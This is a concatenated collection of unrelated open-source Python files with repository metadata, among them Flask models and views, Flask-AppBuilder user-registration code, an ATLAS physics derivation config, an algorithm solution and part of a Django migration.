820a5e2454cddcd8cb18cb9f6630a71d464f709e | f55e27646398ccf20b99d4bf1afdb4cdf1b2f30d | /app/role/models.py | 3501c6f3594509c1dd44d4e2227a3b3da7cd12a1 | [] | no_license | sartim/flask_shop_api | 1f8b96ccdf6bae5b080fa0ff29116f2cbec14c4b | 07b6b4460593ce736866ead6e5f3682b16fc5316 | refs/heads/master | 2023-08-02T23:40:25.897464 | 2023-05-20T06:12:38 | 2023-05-20T06:12:38 | 176,507,271 | 2 | 4 | null | 2023-07-25T22:18:45 | 2019-03-19T12:28:44 | Python | UTF-8 | Python | false | false | 1,473 | py | from app import db
from sqlalchemy import text
from sqlalchemy.dialects.postgresql import UUID
from app.core.base_model import BaseModel, AbstractBaseModel
class Role(BaseModel):
__tablename__ = 'role'
id = db.Column(
UUID(as_uuid=True), primary_key=True,
server_default=text("uuid_generate_v4()")
)
name = db.Column(db.String(255), unique=True, nullable=False)
description = db.Column(db.Text)
deleted = db.Column(db.Boolean, default=False)
permissions = db.relationship("RolePermission", lazy=False)
def __init__(self, id=None, name=None, description=None, deleted=None):
self.id = id
self.name = name
self.description = description
self.deleted = deleted
def __repr__(self):
return "<%r (%r)>" % (self.__class__.__name__, self.name)
class RolePermission(AbstractBaseModel):
__tablename__ = 'role_permission'
role_id = db.Column(UUID(as_uuid=True), db.ForeignKey('role.id'), primary_key=True)
permission_id = db.Column(
UUID(as_uuid=True), db.ForeignKey('permission.id'), primary_key=True
)
role = db.relationship('Role', lazy=False, overlaps="permissions")
permission = db.relationship('Permission', lazy=False)
def __init__(self, role_id=None, permission_id=None):
self.role_id = role_id
self.permission_id = permission_id
def __repr__(self):
return "<%r (%r)>" % (self.__class__.__name__, self.name)
| [
"sarrtim@gmail.com"
] | sarrtim@gmail.com |
932330f52d59db3f156a0cd226118ccfa8de456a | f3f42cd16c7c39f54dcb6891d37369542cf7bc00 | /server.py | e2803cd828506afe19777eb49fcf7cdcd4d4f16b | [] | no_license | imhardikj/inception | 3cfb1d492669c30fdedc65d26c91bc6ee9846bc0 | 7585afa0586a73f4a5553b384b791e68383f0c29 | refs/heads/master | 2020-11-25T02:11:32.171346 | 2019-12-16T18:10:14 | 2019-12-16T18:10:14 | 228,446,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | import os
from flask import Flask, request, redirect,jsonify
from werkzeug.utils import secure_filename
from try_retrain import predict_image_class
from bs4 import BeautifulSoup
import requests
UPLOAD_FOLDER = 'D:/'
ALLOWED_EXTENSIONS = set([ 'png', 'jpg', 'jpeg'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/alzheimer')
def alzheimer():
# URL = "https://www.google.com/search?tbm=nws&q=alzheimer"
URL = "https://news.google.com/search?q=alzheimer"
r = requests.get(URL)
# return r.content
soup = BeautifulSoup(r.content, 'html5lib')
# return str(len(soup.findAll('a',{'class': 'lLrAF'})))
# return r.content
newsList = [] # a list to store quotes
all_news = soup.findAll('article')
print(len(all_news))
# soup.findNextSiblings
all_news = all_news[:10]
for news in all_news:
newsData = {}
newsData['url'] = news.contents[1].a['href']
newsData['title'] = news.contents[1].a.text
newsData['source'] = news.contents[3].div.a.text
newsData['time'] = news.contents[3].div.time.text
newsList.append(newsData)
return jsonify(newsList)
@app.route('/cancer')
def cancer():
# URL = "https://www.google.com/search?tbm=nws&q=alzheimer"
URL = "https://news.google.com/search?q=cancer"
r = requests.get(URL)
# return r.content
soup = BeautifulSoup(r.content, 'html5lib')
# return str(len(soup.findAll('a',{'class': 'lLrAF'})))
# return r.content
newsList = [] # a list to store quotes
all_news = soup.findAll('article')
print(len(all_news))
# soup.findNextSiblings
all_news = all_news[:10]
for news in all_news:
newsData = {}
newsData['url'] = news.contents[1].a['href']
newsData['title'] = news.contents[1].a.text
newsData['source'] = news.contents[3].div.a.text
newsData['time'] = news.contents[3].div.time.text
newsList.append(newsData)
return jsonify(newsList)
@app.route('/', methods=['GET', 'POST'])
def upload_file():
print("START")
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
print('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit an empty part without filename
if file.filename == '':
print('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
testres = predict_image_class(UPLOAD_FOLDER+filename)
print(testres)
return jsonify(testres)
if __name__ == '__main__':
app.run(debug = True,host='0.0.0.0')
| [
"noreply@github.com"
] | imhardikj.noreply@github.com |
60dce4a3326a9bdffb8321222519728bd4e53b3e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_exempts.py | ba3ae516ff8f24200a01a7f19517c7cf4bb06803 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py |
from xai.brain.wordbase.adjectives._exempt import _EXEMPT
#calss header
class _EXEMPTS(_EXEMPT, ):
def __init__(self,):
_EXEMPT.__init__(self)
self.name = "EXEMPTS"
self.specie = 'adjectives'
self.basic = "exempt"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
9f8a8dd6b836f1686c9e46fb4cba274438d27581 | 7b67ea903cc08e31c6156fa4bb7b40b64950b474 | /note32/test_context.py | 7692a0cb759e99eaecbd3a04658721c84423417d | [
"MIT"
] | permissive | icexmoon/python-learning-notes | 62596c2d6a439f30c8c0637eca1af36d88a3bea6 | 838c91d896404290b89992b6517be1b6a79df41f | refs/heads/main | 2023-05-27T11:21:25.575286 | 2021-06-08T07:33:22 | 2021-06-08T07:33:22 | 365,742,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | def test_yield():
print('start')
yield 1
print('after')
ty = test_yield()
next(ty)
next(ty)
# start
# after
# Traceback (most recent call last):
# File "D:\workspace\python\python-learning-notes\note32\test.py", line 8, in <module>
# next(ty)
# StopIteration | [
"icexmoon@qq.com"
] | icexmoon@qq.com |
f56cd91fa9140e05b12a527a040d556bb0d9b957 | 4f8ddd9808535ee8aa900393c3a429f480324574 | /Manipulação_Arquivo/io_1.py | 3b10d40c98aceb024f65e4886c0c612f6187de6c | [] | no_license | kamibarreto/Cod3r | 1de8bb5288c16f90e1060089e7fda8216b6cb7cf | cea86f3984e3d43c0726b9ea809505d00679a314 | refs/heads/master | 2022-12-22T23:13:59.176534 | 2020-09-05T11:01:10 | 2020-09-05T11:01:10 | 284,170,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!/usr/bin/env python3
arquivo = open('/home/kami/Projetos/Cod3r/Manipulação_Arquivo/pessoas.csv') #ele vai abrir o arquivo pessoas.csv com o "open"
dados = arquivo.read() #read vai colocar o conteudo de arquivo em dados, e ai ele vai poder fechar arquivo, pq tudo vai estar na variavel
arquivo.close()
for registro in dados.splitlines(): #ele vai pegar uma das linhas dos nomes e idade e separar
#print(*registro.split(','))
print('Nome: {}\n Idade: {}'.format(*registro.split(',')))
| [
"fabinhobarreto9928@gmail.com"
] | fabinhobarreto9928@gmail.com |
9d848e5fe1603a3252c87bcf55000026afc62ae7 | 6ca3acb227e340edbee80668591e7008cc256b5b | /flask_appbuilder/security/registerviews.py | b341bd27b4e7c10149f5e510a65bd6c77abb877c | [
"BSD-3-Clause"
] | permissive | tuxskar/Flask-AppBuilder | 4c69dce5c13f85b930d5b4761945b33ffb231ef7 | 4f65bbbd7edc6e7ca7c5f62a499677565e0662e1 | refs/heads/master | 2021-01-12T21:04:22.702263 | 2014-12-17T00:20:58 | 2014-12-17T00:20:58 | 28,113,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,361 | py | __author__ = 'dpgaspar'
import uuid
import sys
import logging
from werkzeug.security import generate_password_hash
from flask import render_template, flash, redirect, session, url_for, request
from ..views import expose, PublicFormView
from openid.consumer.consumer import Consumer, SUCCESS, CANCEL
from flask.ext.openid import SessionWrapper, OpenIDResponse, OpenID
from flask.ext.babelpkg import gettext, lazy_gettext
from .models import User, RegisterUser
from .forms import RegisterUserOIDForm, RegisterUserDBForm, LoginForm_oid
from ..models.sqla.interface import SQLAInterface
from ..validators import Unique
from .._compat import as_unicode
log = logging.getLogger(__name__)
def get_first_last_name(fullname):
names = fullname.split()
if len(names) > 1:
return names[0], ' '.join(names[1:])
elif names:
return names[0], ''
class BaseRegisterUser(PublicFormView):
"""
Make your own user registration view and inherit from this class if you
want to implement a completely different registration process. If not,
just inherit from RegisterUserDBView or RegisterUserOIDView depending on
your authentication method.
then override SecurityManager property that defines the class to use::
from flask.ext.appbuilder.security.registerviews import RegisterUserDBView
class MyRegisterUserDBView(BaseRegisterUser):
email_template = 'register_mail.html'
...
class MySecurityManager(SecurityManager):
registeruserdbview = MyRegisterUserDBView
When instantiating AppBuilder set your own SecurityManager class::
appbuilder = AppBuilder(app, db.session, security_manager_class=MySecurityManager)
"""
route_base = '/register'
email_template = 'appbuilder/general/security/register_mail.html'
""" The template used to generate the email sent to the user """
email_subject = lazy_gettext('Account activation')
""" The email subject sent to the user """
activation_template = 'appbuilder/general/security/activation.html'
""" The activation template, shown when the user is activated """
def send_email(self, register_user):
"""
Method for sending the registration Email to the user
"""
try:
from flask_mail import Mail, Message
except:
log.error("Install Flask-Mail to use User registration")
return False
mail = Mail(self.appbuilder.get_app)
msg = Message()
msg.subject = self.email_subject
url = url_for('.activation', _external=True, activation_hash=register_user.registration_hash)
msg.html = render_template(self.email_template,
url=url,
username=register_user.username,
first_name=register_user.first_name,
last_name=register_user.last_name)
msg.recipients = [register_user.email]
try:
mail.send(msg)
except Exception as e:
log.error("Send email exception: {0}".format(str(e)))
return False
return True
def add_registration(self, username, first_name, last_name, email, password=''):
"""
Add a registration request for the user.
:rtype : RegisterUser
"""
register_user = RegisterUser()
register_user.username = username
register_user.email = email
register_user.first_name = first_name
register_user.last_name = last_name
register_user.password = generate_password_hash(password)
register_user.registration_hash = str(uuid.uuid1())
try:
self.appbuilder.get_session.add(register_user)
except Exception as e:
log.exception("Add record error: {0}".format(str(e)))
flash(as_unicode(self.error_message), 'danger')
self.appbuilder.get_session.rollback()
return None
if self.send_email(register_user):
self.appbuilder.get_session.commit()
flash(as_unicode(self.message), 'info')
else:
flash(as_unicode(self.error_message), 'danger')
self.appbuilder.get_session.rollback()
return register_user
@expose('/activation/<string:activation_hash>')
def activation(self, activation_hash):
"""
Endpoint to expose an activation url, this url
is sent to the user by email, when accessed the user is inserted
and activated
"""
reg = self.appbuilder.get_session.query(RegisterUser).filter(
RegisterUser.registration_hash == activation_hash).scalar()
try:
if not self.appbuilder.sm.add_user(username=reg.username,
email=reg.email,
first_name=reg.first_name,
last_name=reg.last_name,
role=self.appbuilder.sm.get_role_by_name(
self.appbuilder.sm.auth_user_registration_role),
password=reg.password):
raise Exception('Could not add user to DB')
self.appbuilder.get_session.delete(reg)
except Exception as e:
log.exception("Add record on user activation error: {0}".format(str(e)))
flash(as_unicode(self.error_message), 'danger')
self.appbuilder.get_session.rollback()
return redirect(self.appbuilder.get_url_for_index)
self.appbuilder.get_session.commit()
return render_template(self.activation_template,
username=reg.username,
first_name=reg.first_name,
last_name=reg.last_name,
appbuilder=self.appbuilder)
class RegisterUserDBView(BaseRegisterUser):
"""
View for Registering a new user, auth db mode
"""
form = RegisterUserDBForm
""" The WTForm form presented to the user to register himself """
form_title = lazy_gettext('Fill out the registration form')
""" The form title """
redirect_url = '/'
error_message = lazy_gettext('Not possible to register you at the moment, try again later')
message = lazy_gettext('Registration sent to your email')
""" The message shown on a successful registration """
def form_get(self, form):
datamodel_user = SQLAInterface(User, self.appbuilder.get_session)
datamodel_register_user = SQLAInterface(RegisterUser, self.appbuilder.get_session)
if len(form.username.validators) == 1:
form.username.validators.append(Unique(datamodel_user, 'username'))
form.username.validators.append(Unique(datamodel_register_user, 'username'))
if len(form.email.validators) == 2:
form.email.validators.append(Unique(datamodel_user, 'email'))
form.email.validators.append(Unique(datamodel_register_user, 'email'))
def form_post(self, form):
self.add_registration(username=form.username.data,
first_name=form.first_name.data,
last_name=form.last_name.data,
email=form.email.data,
password=form.password.data)
class RegisterUserOIDView(BaseRegisterUser):
"""
View for Registering a new user, auth OID mode
"""
route_base = '/register'
form = RegisterUserOIDForm
form_title = lazy_gettext('Fill out the registration form')
error_message = lazy_gettext('Not possible to register you at the moment, try again later')
message = lazy_gettext('Registration sent to your email')
default_view = 'form_oid_post'
@expose("/formoidone", methods=['GET', 'POST'])
def form_oid_post(self, flag=True):
if flag:
self.oid_login_handler(self.form_oid_post, self.appbuilder.sm.oid)
form = LoginForm_oid()
if form.validate_on_submit():
session['remember_me'] = form.remember_me.data
return self.appbuilder.sm.oid.try_login(form.openid.data, ask_for=['email', 'fullname'])
resp = session.pop('oid_resp', None)
if resp:
self._init_vars()
form = self.form.refresh()
self.form_get(form)
form.username.data = resp.email
first_name, last_name = get_first_last_name(resp.fullname)
form.first_name.data = first_name
form.last_name.data = last_name
form.email.data = resp.email
widgets = self._get_edit_widget(form=form)
#self.update_redirect()
return self.render_template(self.form_template,
title=self.form_title,
widgets=widgets,
form_action='form',
appbuilder=self.appbuilder)
else:
flash(as_unicode(self.error_message), 'warning')
return redirect(self.get_redirect())
def oid_login_handler(self, f, oid):
"""
Hackish method to make use of oid.login_handler decorator.
"""
if request.args.get('openid_complete') != u'yes':
return f(False)
consumer = Consumer(SessionWrapper(self), oid.store_factory())
openid_response = consumer.complete(request.args.to_dict(),
oid.get_current_url())
if openid_response.status == SUCCESS:
return self.after_login(OpenIDResponse(openid_response, []))
elif openid_response.status == CANCEL:
oid.signal_error(u'The request was cancelled')
return redirect(oid.get_current_url())
oid.signal_error(u'OpenID authentication error')
return redirect(oid.get_current_url())
def after_login(self, resp):
"""
Method that adds the return OpenID response object on the session
this session key will be deleted
"""
session['oid_resp'] = resp
def form_get(self, form):
datamodel_user = SQLAInterface(User, self.appbuilder.get_session)
datamodel_register_user = SQLAInterface(RegisterUser, self.appbuilder.get_session)
if len(form.username.validators) == 1:
form.username.validators.append(Unique(datamodel_user, 'username'))
form.username.validators.append(Unique(datamodel_register_user, 'username'))
if len(form.email.validators) == 2:
form.email.validators.append(Unique(datamodel_user, 'email'))
form.email.validators.append(Unique(datamodel_register_user, 'email'))
def form_post(self, form):
self.add_registration(username=form.username.data,
first_name=form.first_name.data,
last_name=form.last_name.data,
email=form.email.data)
| [
"danielvazgaspar@gmail.com"
] | danielvazgaspar@gmail.com |
083ba568862e297eb94e0c17898fa3699f67ce16 | 6066b2af4b4f6ab967cfb8af8ec3b8ee68545ab9 | /Key Terms Extraction/Topics/Regexps in Python/Match or not match/main.py | 7a794774d3b29e1f7480885d26d99a3befeb3b5c | [] | no_license | zsbati/PycharmProjects | 7b29b210b4878af42baf288c585675d0203b9805 | c13b05901c5ff8ea6fc7bcb61c70aa40940daa56 | refs/heads/main | 2023-09-04T09:01:19.315655 | 2021-10-24T16:24:43 | 2021-10-24T16:24:43 | 401,172,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | import re
def matched(template, string):
return re.match(template, string) is not None
| [
"zbati123@gmail.com"
] | zbati123@gmail.com |
5e5c71a02a8be32bfa37c518c777781b96b690f6 | 2dbaf18e92d31a2b8a5ffbd213c62a94a3256076 | /taobei/tbbuy/models/cart_product.py | f264206ebfa05d7f7c20112b4d64781658dac435 | [] | no_license | ruoshengyuan/guanfang | 17c289677f44a50fdd4ae7a1d9858608228496e0 | 251f514636c4828f28aa65b2bd6fc1fe46f4437a | refs/heads/master | 2022-12-13T18:05:50.268182 | 2019-09-24T13:42:09 | 2019-09-24T13:42:09 | 201,073,359 | 3 | 0 | null | 2022-12-07T23:53:57 | 2019-08-07T15:04:07 | Python | UTF-8 | Python | false | false | 839 | py | from sqlalchemy import Column, Integer, String, ForeignKey, UniqueConstraint, Index
from sqlalchemy.orm import relationship
from marshmallow import Schema, fields, post_load
from .base import Base
class CartProduct(Base):
__tablename__ = 'cart_product'
__table_args__ = (
UniqueConstraint('user_id', 'product_id'),
Index('idx_product_id', 'product_id'),
)
user_id = Column(Integer, nullable=False)
product_id = Column(Integer, nullable=False)
amount = Column(Integer, nullable=False, default=1)
class CartProductSchema(Schema):
id = fields.Int()
user_id = fields.Int()
product_id = fields.Int()
amount = fields.Int()
created_at = fields.DateTime()
updated_at = fields.DateTime()
@post_load
def make_cart_product(self, data):
return CartProduct(**data)
| [
"jaggerwang@gmail.com"
] | jaggerwang@gmail.com |
3819d5a9b598f699ab0e2807b410b5841ee47825 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/PhysicsAnalysis/DerivationFramework/DerivationFrameworkExotics/share/EXOT9.py | 716d4dc175f4037ddd5a4a78237cff509e18f99b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,760 | py | #********************************************************************
# EXOT9.py
# reductionConf flag EXOT9 in Reco_tf.py
#********************************************************************
from DerivationFrameworkCore.DerivationFrameworkMaster import *
from DerivationFrameworkJetEtMiss.JetCommon import *
from DerivationFrameworkJetEtMiss.METCommon import *
from DerivationFrameworkEGamma.EGammaCommon import *
from DerivationFrameworkMuons.MuonsCommon import *
from DerivationFrameworkCore.WeightMetadata import *
from AthenaCommon.GlobalFlags import globalflags
isMC = False
if globalflags.DataSource()=='geant4':
isMC = True
exot9Seq = CfgMgr.AthSequencer("EXOT9Sequence")
#====================================================================
# THINNING TOOLS
#====================================================================
thinningTools = []
# Tracks associated with Muons
from DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__MuonTrackParticleThinning
EXOT9MuonTPThinningTool = DerivationFramework__MuonTrackParticleThinning(name = "EXOT9MuonTPThinningTool",
ThinningService = "EXOT9ThinningSvc",
MuonKey = "Muons",
InDetTrackParticlesKey = "InDetTrackParticles",
ConeSize = 0.4)
ToolSvc += EXOT9MuonTPThinningTool
thinningTools.append(EXOT9MuonTPThinningTool)
# Tracks associated with Electrons
from DerivationFrameworkInDet.DerivationFrameworkInDetConf import DerivationFramework__EgammaTrackParticleThinning
EXOT9ElectronTPThinningTool = DerivationFramework__EgammaTrackParticleThinning(name = "EXOT9ElectronTPThinningTool",
ThinningService = "EXOT9ThinningSvc",
SGKey = "Electrons",
InDetTrackParticlesKey = "InDetTrackParticles",
ConeSize = 0.4)
ToolSvc += EXOT9ElectronTPThinningTool
thinningTools.append(EXOT9ElectronTPThinningTool)
# truth thinning
from DerivationFrameworkMCTruth.DerivationFrameworkMCTruthConf import DerivationFramework__MenuTruthThinning
EXOT9TruthTool = DerivationFramework__MenuTruthThinning(name = "EXOT9TruthTool",
ThinningService = "EXOT9ThinningSvc",
WritePartons = False,
WriteHadrons = False,
WriteBHadrons = False,
WriteGeant = False,
GeantPhotonPtThresh = -1.0,
WriteTauHad = False,
PartonPtThresh = -1.0,
WriteBSM = True,
WriteBosons = True,
WriteBSMProducts = True,
WriteBosonProducts = True,
WriteTopAndDecays = True,
WriteEverything = False,
WriteAllLeptons = False,
WriteStatus3 = False,
PreserveGeneratorDescendants = False,
PreserveAncestors = True,
WriteFirstN = -1)
if isMC:
ToolSvc += EXOT9TruthTool
thinningTools.append(EXOT9TruthTool)
truth_cond_Lepton = "((abs(TruthParticles.pdgId) >= 11) && (abs(TruthParticles.pdgId) <= 16) && (TruthParticles.pt > 1*GeV) && ((TruthParticles.status ==1) || (TruthParticles.status ==2) || (TruthParticles.status ==3) || (TruthParticles.status ==23)) && (TruthParticles.barcode<200000))"
from DerivationFrameworkMCTruth.DerivationFrameworkMCTruthConf import DerivationFramework__GenericTruthThinning
EXOT9TruthTool2 = DerivationFramework__GenericTruthThinning(name = "EXOT9TruthTool2",
ThinningService = "EXOT9ThinningSvc",
ParticleSelectionString = truth_cond_Lepton,
PreserveDescendants = False,
PreserveGeneratorDescendants = True,
PreserveAncestors = True)
if isMC:
ToolSvc += EXOT9TruthTool2
thinningTools.append(EXOT9TruthTool2)
#=======================================
# CREATE THE SKIMMING TOOL
#=======================================
beamEnergy = jobproperties.Beam.energy()
expression = ''
if (beamEnergy < 4.1e+06):
triggerStrategy = '(EventInfo.eventTypeBitmask==1) || (EF_xe80_tclcw || EF_xe80_tclcw_loose || EF_e24vhi_medium1 || EF_e60_medium1 || EF_mu24i_tight || EF_mu36_tight || EF_g120_loose)'
if (beamEnergy > 6.0e+06):
#triggerStrategy = '(EventInfo.eventTypeBitmask==1) || (HLT_mu26_imedium || HLT_mu50 || HLT_mu60_msonly_0eta105 || HLT_e28_tight_iloose || HLT_e60_medium || HLT_g140_loose || HLT_xe100 || HLT_g60_loose_xe60 || HLT_e140_loose)'
triggerStrategy = '(count(Electrons.pt > 50*GeV && (Electrons.DFCommonElectronsLHLoose||Electrons.DFCommonElectronsLHMedium||Electrons.DFCommonElectronsLHTight||Electrons.DFCommonElectronsIsEMLoose||Electrons.DFCommonElectronsIsEMMedium||Electrons.DFCommonElectronsIsEMTight)) >= 1) || (count(Muons.pt > 50*GeV && (Muons.DFCommonGoodMuon && Muons.muonType == 0)) >= 1)'
from DerivationFrameworkTools.DerivationFrameworkToolsConf import DerivationFramework__xAODStringSkimmingTool
EXOT9SkimmingTool = DerivationFramework__xAODStringSkimmingTool( name = "EXOT9SkimmingTool1",
expression = triggerStrategy)
ToolSvc += EXOT9SkimmingTool
print EXOT9SkimmingTool
#=======================================
# CREATE THE DERIVATION KERNEL ALGORITHM
#=======================================
from DerivationFrameworkCore.DerivationFrameworkCoreConf import DerivationFramework__DerivationKernel
DerivationFrameworkJob += exot9Seq
exot9Seq += CfgMgr.DerivationFramework__DerivationKernel("EXOT9Kernel_skim", SkimmingTools = [EXOT9SkimmingTool])
exot9Seq += CfgMgr.DerivationFramework__DerivationKernel("EXOT9Kernel", ThinningTools = thinningTools)
#====================================================================
# SET UP STREAM
#====================================================================
streamName = derivationFlags.WriteDAOD_EXOT9Stream.StreamName
fileName = buildFileName( derivationFlags.WriteDAOD_EXOT9Stream )
EXOT9Stream = MSMgr.NewPoolRootStream( streamName, fileName )
EXOT9Stream.AcceptAlgs(["EXOT9Kernel"])
# Thinning
from AthenaServices.Configurables import ThinningSvc, createThinningSvc
augStream = MSMgr.GetStream( streamName )
evtStream = augStream.GetEventStream()
svcMgr += createThinningSvc( svcName="EXOT9ThinningSvc", outStreams=[evtStream] )
#====================================================================
# Add the containers to the output stream - slimming done here
#====================================================================
from DerivationFrameworkCore.SlimmingHelper import SlimmingHelper
from DerivationFrameworkExotics.EXOT9ContentList import *
EXOT9SlimmingHelper = SlimmingHelper("EXOT9SlimmingHelper")
EXOT9SlimmingHelper.StaticContent = EXOT9Content
EXOT9SlimmingHelper.AllVariables = EXOT9AllVariables
EXOT9SlimmingHelper.SmartCollections = EXOT9SmartCollections
EXOT9SlimmingHelper.IncludeEGammaTriggerContent = True
EXOT9SlimmingHelper.IncludeMuonTriggerContent = True
EXOT9SlimmingHelper.AppendContentToStream(EXOT9Stream)
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
49ac9d28cdc33d372bad35111a0dada73d3cf5c4 | c4e3a57511eb7a39425847bdcd38a2207e560a13 | /Algorithm/909_Snakes_Or_Ladders.py | 4a704f1a03ea4df560bf51751413b205e395c053 | [] | no_license | Gi1ia/TechNoteBook | 57af562b78278b7f937b906d1154b19f2c077ebd | 1a3c1f4d6e9d3444039f087763b93241f4ba7892 | refs/heads/master | 2021-06-03T02:31:24.986063 | 2020-07-16T22:25:56 | 2020-07-16T22:25:56 | 141,761,958 | 7 | 1 | null | 2018-11-05T01:09:46 | 2018-07-20T22:06:12 | HTML | UTF-8 | Python | false | false | 1,299 | py | import collections
class Solution:
def snakesAndLadders(self, board):
"""
:type board: List[List[int]]
:rtype: int
"""
if not board or not board[0] or len(board[0]) == 1:
return 0
# Reorder board to straight
n = len(board)
straight = []
index = []
seq = 1
for i in reversed(range(n)):
if seq == 1:
straight.extend(board[i])
seq = -1
else:
straight.extend(reversed(board[i]))
seq = 1
# Calculate
step = 0
seen = {1:0}
possible = collections.deque([1])
while possible:
cursor = possible.popleft()
if cursor == n*n:
return seen[cursor]
# move to next
for cursor2 in range(cursor + 1, cursor + 7):
if cursor2 > n*n:
continue
if straight[cursor2 - 1] != -1:
cursor2 = straight[cursor2 - 1]
if cursor2 not in seen:
possible.append(cursor2)
seen[cursor2] = seen[cursor] + 1
return -1
| [
"41492334+Gi1ia@users.noreply.github.com"
] | 41492334+Gi1ia@users.noreply.github.com |
ffb6607401c22caf600ff9a032495a22b1808ea7 | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/mongoDB_additional_params.py | 7224cbcb0a345aae191387f6feddcbb4add9c4ad | [
"Apache-2.0"
] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,906 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class MongoDBAdditionalParams(object):
"""Implementation of the 'MongoDBAdditionalParams' model.
Contains additional parameters required for taking backup from
this Mongo cluster.
Attributes:
secondary_node_tag (list of string): The tag associated with the
secondary nodes from which backups should be performed.
use_secondary_for_backup (bool): Set to true if this cluster uses
secondary nodes for backup.
"""
# Create a mapping from Model property names to API property names
_names = {
"secondary_node_tag": 'secondaryNodeTag',
"use_secondary_for_backup": 'useSecondaryForBackup'
}
def __init__(self,
secondary_node_tag=None,
use_secondary_for_backup=None):
"""Constructor for the MongoDBAdditionalParams class"""
# Initialize members of the class
self.secondary_node_tag = secondary_node_tag
self.use_secondary_for_backup = use_secondary_for_backup
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
secondary_node_tag = dictionary.get('secondaryNodeTag')
use_secondary_for_backup = dictionary.get('useSecondaryForBackup')
# Return an object of this model
return cls(secondary_node_tag,
use_secondary_for_backup)
| [
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
d8135d350a5efd8400b5d8049c2655c6b35e83eb | 522d50be4c7c4f289706eaf9b07e6a17b0d46199 | /src/djangopycsw/migrations/0011_auto_20150710_1157.py | d2bdf148b01958799a29b410b0777b4899bf8c14 | [] | no_license | ricardogsilva/django-pycsw | f7f4655ccc1d686074c4a0cded198290767fd788 | 0b51dcf0456e7d9f366874ac3f066e295f533876 | refs/heads/master | 2021-01-18T14:19:16.313364 | 2017-11-08T22:50:41 | 2017-11-08T22:50:41 | 38,635,333 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,568 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('djangopycsw', '0010_auto_20150710_1155'),
]
operations = [
migrations.AlterField(
model_name='collaborator',
name='fax',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='collaborator',
name='phone',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='organization',
name='city',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='organization',
name='country',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='organization',
name='postal_code',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='organization',
name='state_or_province',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='pycswconfig',
name='inspire_default_language',
field=models.CharField(max_length=100, blank=True),
),
migrations.AlterField(
model_name='record',
name='coupling_type',
field=models.CharField(help_text=b'Maps to pycsw:CouplingType', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='distance_uom',
field=models.CharField(help_text=b'Maps to pycsw:DistanceUOM', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='distance_value',
field=models.CharField(help_text=b'Maps to pycsw:DistanceValue', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='geographic_description_code',
field=models.CharField(help_text=b'Maps to pycsw:GeographicDescriptionCode', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='operation',
field=models.CharField(help_text=b'Maps to pycsw:Operation', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='resource_language',
field=models.CharField(help_text=b'Maps to pycsw:ResourceLanguage', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='service_type',
field=models.CharField(help_text=b'Maps to pycsw:ServiceType', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='service_type_version',
field=models.CharField(help_text=b'Maps to pycsw:ServiceTypeVersion', max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='record',
name='specification_date_type',
